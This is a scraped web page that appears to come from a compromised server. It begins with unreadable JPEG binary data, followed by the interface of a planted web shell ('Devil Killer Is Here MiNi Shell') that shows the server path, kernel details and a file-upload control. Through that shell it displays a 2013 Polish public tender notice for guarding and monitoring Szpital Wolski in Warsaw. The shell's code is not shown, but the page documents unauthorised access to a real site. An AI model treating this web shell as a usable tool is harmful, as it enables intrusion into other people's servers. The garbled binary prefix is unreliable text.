JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130716/278390-N-2013.html

<p class="kh_header"><b>Warszawa: Ochrona terenu oraz obiektów Szpitala Wolskiego wraz z monitoringiem</b><br>
<b>Numer ogłoszenia: 278390 - 2013; data zamieszczenia: 16.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kasprzaka 17, 01-211 Warszawa, woj. mazowieckie, tel. 022 3894859, faks 022 3894922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wolski.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona terenu oraz obiektów Szpitala Wolskiego wraz z monitoringiem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia jest Ochrona terenu oraz obiektów Szpitala Wolskiego wraz z monitoringiem, Przedmiotem zamówienia jest całodobowa ochrona nieruchomości Szpitala Wolskiego oraz ochrona bezpośrednia mienia i osób znajdujących się na terenie nieruchomości. 
3.2.	Ochrona osób polegać będzie na działaniach Wykonawcy, mających na celu zapewnienie bezpieczeństwa życia i zdrowia osób  znajdujących się na chronionym terenie.
3.3.	Ochrona mienia Zamawiającego polegać będzie na działaniach Wykonawcy zapobiegających przestępstwom przeciwko mieniu polegającym na kradzieży, włamaniu, wandalizmie a także powstaniu szkody wynikającej z tych zdarzeń. ochrona mienia obejmuje mienie znajdujące się na terenie  Zamawiającego. Przez mienie Zamawiającego podlegające ochronie, należy rozumieć w szczególności środki trwałe i wyposażenie wpisane do ewidencji Zamawiającego oraz wartości pieniężne znajdujące się na terenie chronionego obiektu i zabezpieczone w sposób uniemożliwiający ich utratę, bez uszkodzenia zamków, plomb i innego rodzaju zabezpieczeń.
3.4.	Bezpośrednia ochrona  wykonywana będzie przez zatrudnionych przez Wykonawcę pracowników ochrony.
3.5.	Monitoring systemów alarmowych w punktach wskazanych przez Zamawiającego;
3.6.	W ramach usługi Wykonawca dokona przestrojenia lub doposażenia istniejącego systemu alarmowego Zamawiającego do częstotliwości Wykonawcy.
3.7.	Na terenie Szpitala Wolskiego znajdują się kamery w miejscach wyznaczonych przez Zamawiającego, ochrona znajdująca się w portierni przy pawilonie nr 2gdzie ma stały podgląd na monitorach;
3.8.	Sprzęt komputerowy, kamery, wszelkie akcesoria potrzebne do prawidłowego funkcjonowania ochrony oraz monitoringu Zamawiający przekazuje Wykonawcy oraz zobowiązuje go do wykonywania przeglądów serwisowych oraz w razie awarii do naprawy sprzętu na swój koszt.
3.9.	Wykonawca zobowiązany jest do zapoznania się z miejscem realizacji zamówienia, co potwierdzi stosownym oświadczeniem stanowiącym załącznik nr 8 do SIWZ.
3.10.	Kompleksowa ochrona obiektów Zamawiającego winna być sprawowana przez  pracowników Wykonawcy:
1	spełniających obowiązujące w publicznych zakładach opieki zdrowotnej, określone dla pracowników wymagania zdrowotne;
2	przygotowanych zawodowo do wykonywania czynności ochronnych;
3	wyposażonych w bezprzewodowe środki łączności;
4	jednakowo umundurowanych i wyposażonych w identyfikatory wg. wskazań Zamawiającego na koszt Wykonawcy.
3.11.	Wykonawca winien dysponować  załoga interwencyjną , która dotrze do Szpitala Wolskiego w ciągu 20 minut od wezwania.
3.12.	Ochrona winna być realizowana w postaci ochrony , obchodów patrolowych oraz  interwencji zespołów interwencyjnych.
3.13.	Ochrona winna być sprawowana poprzez pełnienie całodobowych dyżurów przez   pracowników ochrony w następujących miejscach:
1	W portierni przy pawilonie nr 2 - ochrona całodobowa, przy czym jeden pracownik winien  pełnić  dyżur  w formie obchodów terenu w godzinach 1500-2000 co dwie godziny, natomiast w godzinach 2000-600 co trzy godziny; od 6,00 do 15,00 ochrona przebywa w portierni  oraz w pobliżu w celu wydawania kluczy pracownikom Szpitala Wolskiego.
2	Otwieranie oraz zamykanie pawilonu nr 7 wejście od strony Barku w godzinach 6,30 oraz 16,30. 
3	Otwieranie oraz zamykanie pawilonu nr 2   godzina 6,30  16,00 wejście główne do pawilonu wraz z kratą.
4	W Szpitalnym Oddziale Ratunkowym  ochrona całodobowa w miejscu wyznaczonym do  monitoringu przystosowanym przez Wykonawcę. 
3.14.	Uwaga! Wejście furtka od strony ul. Szarych Szeregów zamknięta jest w 
godz.1500 600 
3.15.	Do obowiązków pracowników ochrony należy:
1	dozór  chronionych obiektów;
2	sprawowanie nadzoru nad ruchem osób wchodzących i wychodzących oraz ruchem pojazdów na terenie chronionych obiektów w aspekcie:
a	uniemożliwienia dostępu na teren Szpitala osobom będącym pod wpływem alkoholu lub innych środków odurzających, nie będących pacjentami, akwizytorów oraz innych osób niepowołanych, wchodzących w ciągu dnia wejściami zabezpieczonymi przez pracowników ochrony,
b	zakaz wprowadzania psów na teren Szpitala Wolskiego
c	przeciwdziałania wszelkim próbom zakłócania porządku i kradzieżom na terenie  Szpitala;
d	przeciwdziałanie nad parkowaniem pojazdów w miejscach niedozwolonych
3	wydawanie kluczy osobom upoważnionym zgodnie z przekazanym przez Szpital wykazem oraz zgodnie z obowiązującym Regulaminem wewnętrznym Szpitala Wolskiego 
4	zapewnienie szczególnej ochrony zamkniętemu budynkowi administracyjnemu-pawilon nr 2 wraz z pomieszczeniem Kasowym oraz  pomieszczeniom magazynowym w pawilonie 8A; 
5	podejmowanie dopuszczalnych prawem, w ramach posiadanych uprawnień, działań interwencyjnych w razie zagrożenia bezpieczeństwa personelu, pacjentów oraz interesantów Szpitala lub ochrona przed kradzieżą lub wandalizmem;
6	powiadamianie właściwych terytorialnie jednostek Policji, Straży Pożarnej, Straży Miejskiej o zaistniałych zagrożeniach na terenie chronionej nieruchomości;
7	niezwłoczne powiadomienie osób upoważnionych przez Dyrekcję Szpitala Wolskiego o awariach związanych z funkcjonowaniem urządzeń technicznych lub uszkodzeniem instalacji wodnej, elektrycznej, alarmowej lub z innymi zdarzeniami losowymi powodującymi zagrożenie bezpieczeństwa osób przebywających na terenie nieruchomości Szpitala lub zagrożenie ciągłości pracy Zamawiającego;
8	przestrzeganie Regulaminu organizacji ruchu i parkowania na terenie Szpitala Wolskiego;
9	prowadzenie książki zdania i przyjęcia każdej służby i odnotowywanie w niej wszystkich ważnych zdarzeń związanych z bezpieczeństwem nieruchomości, mienia i osób będących na terenie Szpitala lub w jego bezpośredniej bliskości;
10	obsługa połączeń telefonicznych od godziny 15:00 do 6:00 w dni  robocze oraz 24 h w dni wolne od pracy wg aktualnej listy telefonów przekazanych przez Zamawiającego;
11	udzielanie osobom zainteresowanym informacji o usytuowaniu na terenie Szpitala oddziałów, poradni, gabinetów oraz jednostek organizacyjnych;
12)	 obsługa szlabanu wjazdowego podczas awarii, powiadomienie z osoby upoważnionej przez Zamawiającego; 
13	w przypadku zakłócenia porządku publicznego oraz wystąpienia czynników zagrożenia zdrowia i życia wezwanie grupy interwencyjnej na koszt Wykonawcy. 
14	dbanie o porządek w portierni przy pawilonie nr 2oraz wokół niej;
15	Zamykanie bramy wyjazdowej po wyjeździe każdej karetki  szczególnie w okresie jesienno - zimowym - wiata SOR dla karetek
16	W okresie zimy nadzór nad powierzchnią wiaty SOR podjazd dla karetek tj. odśnieżanie wiaty oraz podjazdu dla karetek , posypywanie nawierzchni wiaty  piachem oraz solą dostarczoną przez Zamawiającego -  w godzinach od 14 ,00 do 8,00.
3.16.	Do podstawowych obowiązków pracowników ochrony w zakresie ochrony przeciwpożarowej należy w szczególności:
1	znajomość i przestrzeganie przepisów i zasad bezpieczeństwa pożarowego,
2	znajomość procedur postępowania na wypadek powstania pożaru, sposobów alarmowania i przeprowadzania ewakuacji, urządzeń przeciwpożarowych,
3	znajomość przeznaczenia nadzorowanych pomieszczeń, ewentualnych przyczyn mogących spowodować wybuch pożaru,
4	znajomość rozmieszczenia hydrantów zewnętrznych na posesji i umiejętność określania ich położenia w porze nocnej,
5	znajomość numerów alarmowych do Państwowej Straży Pożarnej, Policji i Pogotowia Ratunkowego,
6	znajomość użycia podręcznego sprzętu gaśniczego, 
7	znajomość usytuowania wyjść ewakuacyjnych z budynku i możliwości ich otwarcia,
8	zgłaszanie zauważonych usterek odpowiednim osobom w Szpitalu Wolskim,
9	udział w ewakuacji ludzi i mienia,
10	 udzielanie niezbędnej pomocy i informacji jednostkom biorącym udział w akcji gaśniczej,
11	 przestrzeganie zakazu palenia tytoniu i używania otwartego ognia w miejscach niedozwolonych,
12	 w porze nocnej zorganizowanie akcji ratowniczo-gaśniczej na wypadek powstania pożaru, przyjmując następujący tok postępowania:
1	zaalarmowanie Państwowej Straży Pożarnej,
2	przystąpienie do gaszenia pożaru przy pomocy sprzętu podręcznego,
3	powiadomienie osoby upoważnionej przez Zamawiającego,
4	zabezpieczenia obiektu przed kradzieżą w czasie i po akcji gaśniczej prowadzonej przez jednostki Państwowej Straży Pożarnej,
13	w czasie dokonywania obchodów nadzorowanego terenu zwracać uwagę na wszelkie zjawiska mające znamiona pożaru oraz sprawdzać:
a	czy właściwie zabezpieczono obiekt  - pawilon nr 2, nr 7 oraz pawilon 8A  przed wejściem niepowołanych osób na jego teren,
3.17.	Wykonawca zapewnia nadajniki do monitorowania wygenerowanych sygnałów alarmowych na czas trwania Umowy minimum  8 sztuk oraz przestroi obecne do częstotliwości Wykonawcy.
3.18.	Zamawiający zabezpiecza dla potrzeb realizacji usługi stanowiącej przedmiot zamówienia pomieszczenia  w budynku portierni 29,m2  na podstawie odrębnej umowy najmu za wynagrodzeniem
3.19.	Zamawiający zapewni za odpłatnością możliwość korzystania ze szpitalnego telefonu komórkowego.
3.20.	Wykonawca wykona po wcześniejszej akceptacji przez Dyrektora Szpitala na własny koszt ewentualny remont pomieszczeń socjalnych w budynku portierni oraz wszelkie prace adaptacyjne przystosowujące budynek do celów realizacji usług stanowiących przedmiot zamówienia. Nakłady poniesione przez Wykonawcę na remont budynku nie będą podlegały zwrotowi ani rozliczeniu.
3.21.	Zamawiający zobowiązuje się do:
1	udostępnienia źródła poboru energii elektrycznej,
2	udostępnienia źródła poboru wody i przyjmowania ścieków 
3	udostępnienia centralnego ogrzewania,
4	udostępnienia łączności telefonicznej,
5	zapewnienia dojazdu do miejsca realizacji usługi.
3.22.	Koszt w w świadczeń Wykonawca będzie ponosił na podstawie wystawionej faktury VAT płatnej w terminie 30 dni od daty wystawienia, na konto Zamawiającego wskazane na fakturze.
3.23.	W czasie trwania umowy wszelkie koszty związane z utrzymaniem sprzętu (naprawy, wymiany części, serwisy, przeglądy itd. ponosi Wykonawca.
3.24.	UWAGA Zamawiający, na podstawie umowy najmu udostępni Wykonawcy pomieszczenia przeznaczone na portiernię. Zgodnie z Zarządzeniem nr 19352008 Prezydenta m.st. Warszawy z dnia 8 sierpnia 2008 roku w sprawie zasad zawierania  umów najmu i dzierżawy nieruchomości przez samodzielne publiczne zakłady opieki zdrowotnej na okres nie dłuższy niż 3 lata, Dyrektor Zakładu może odstąpić od przeprowadzania konkursu ofert  w przypadku zawierania umów najmu  z podmiotem wyłonionym w drodze przetargu przeprowadzonego na podstawie przepisów ustawy o zamówieniach publicznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do złożenia wadium w wysokości: 12.000,00 zł brutto    słownie złotych: dwanaście tysięcy
Wadium wnosi się przed upływem terminu składania ofert. 
12.3 Wadium należy wnieść do dnia 24 lipca 2013 roku do godz.: 09:00
12.4	Wadium może być wnoszone w jednej lub kilku następujących formach: 
1	pieniądzu; 
2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze w formie pieniężnej; 
3	gwarancjach bankowych; 
4	gwarancjach ubezpieczeniowych; 
5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U.z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz 730 i 732 i Nr 227, poz 1505 oraz z 2010 r. Nr 96, poz 620. 
12.5	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: 
Nordea Bank Polska SA z siedziba 81-303 Gdynia ul. Kielecka 2, 
numer rachunku: 21 1440 1101 0000 0000 0606 2539
12.6		Wadium wniesione w pieniądzu musi wpłynąć na konto zamawiającego do upływu terminu składania ofert. 
UWAGA!!! Kserokopię dowodu wpłaty należy dołączyć do oferty.
12.7	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
12.8	W przypadku wniesienia wadium w innej formie niż pieniądz Zamawiający wymaga złożenia oryginału dokumentu potwierdzającego wniesienie wadium w siedzibie Zamawiającego, pokój nr 18, najpóźniej w terminie składania ofert. Kserokopię wniesienia wadium w formie niepieniężnej zaleca się dołączyć do oferty. 
12.9	Dokument wadium wniesionego w formie gwarancji bankowej/ubezpieczeniowej powinien zawierać klauzulę o gwarantowaniu wypłaty należności w sposób nieodwołalny, bezwarunkowy, na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. 
12.10	Zamawiający zwraca wadium niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 12 pkt. 10 i 11.
12.11	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w  odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złoży dokumentów  lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
12.12	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
1	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
12.13 Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12.14	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż posiada ważną koncesję na wykonanie usługi ochrony osób i mienia określającą zakres i formy prowadzenia tej usługi, wydaną na podstawie ustawy z dnia 22 sierpnia 1997 o ochronie osób i mienia Dz. U z 2005r., Nr 145 poz. 1221 z późn. zm..</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia wiedzy i doświadczenia Wykonawcy winni wykazać się wykonaniem a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy 
 w tym okresie, co najmniej 1 usługi ochrony osób i mienia obiektów szpitalnych tj. szpitali, centrów zdrowia, klinik lub innych obiektów służby zdrowia, realizujących świadczenia zdrowotne w warunkach zamkniętych, świadczonych nieprzerwanie przez min. 12 miesięcy. Wartość  usługi musi wynosić nie mniej niż 300.000,00 zł brutto rocznie każda z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie - sporządzony według wzoru wykazu stanowiącego Załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie osobami
1	nie karalnymi, posiadające odpowiednie kwalifikacje zawodowe, o ile są wymagane w obowiązujących w tym zakresie przepisach, jednolicie umundurowane, z imiennymi identyfikatorami; szczegółowe informacje o identyfikatorach zawiera załącznik nr 10 do SIWZ
2	posiadające co najmniej 12 miesięczny staż pracy w ochronie osób i mienia; 
3	posiadające umiejętność obsługi funkcjonujących na terenie obiektu systemu  sygnalizacji napadowo  włamaniowej, gaszenia pożarów podręcznym sprzętem p. pożarowym możliwa wizja lokalna w celu zapoznania się z SSWiN;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie osobami
1	nie karalnymi, posiadające odpowiednie kwalifikacje zawodowe, o ile są wymagane w obowiązujących w tym zakresie przepisach, jednolicie umundurowane, z imiennymi identyfikatorami; szczegółowe informacje o identyfikatorach zawiera załącznik nr 10 do SIWZ
2	posiadające co najmniej 12 miesięczny staż pracy w ochronie osób i mienia; 
3	posiadające umiejętność obsługi funkcjonujących na terenie obiektu systemu  sygnalizacji napadowo  włamaniowej, gaszenia pożarów podręcznym sprzętem p. pożarowym możliwa wizja lokalna w celu zapoznania się z SSWiN;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże iż posiada jest opłaconą polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę minimum 4.000.000,00 PLN na jedno i wszystkie zdarzenia Zamawiający dokona oceny spełniania każdego z warunków na podstawie załączonych do oferty wymaganych oświadczeń lub dokumentów. Brak załączenia przez Wykonawcę któregokolwiek z oświadczeń lub dokumentów zostanie uznane przez Zamawiającego jako niespełnienie warunku, co będzie skutkować wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy.
9.2.	Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia. 
9.3.	Z treści załączonych do oferty oświadczeń lub dokumentów musi jednoznacznie wynikać, iż wymagane warunki Wykonawca spełnił.
9.4.	Zamawiający zgodnie z art. 92 ust. 1 pkt. 3 ustawy zawiadomi Wykonawców o wykluczeniu z postępowania, podając uzasadnienie faktyczne i prawne.
9.5.	Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

